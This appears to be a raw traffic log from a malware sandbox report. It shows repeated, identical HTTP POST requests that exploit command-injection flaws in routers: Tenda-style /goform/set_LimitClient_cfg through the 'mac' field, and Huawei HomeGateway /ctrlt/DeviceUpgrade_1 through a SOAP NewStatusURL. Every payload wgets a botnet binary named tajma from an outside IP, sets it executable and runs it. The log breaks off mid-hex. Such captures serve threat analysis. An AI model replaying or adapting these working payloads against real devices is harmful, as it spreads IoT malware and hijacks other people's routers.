                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 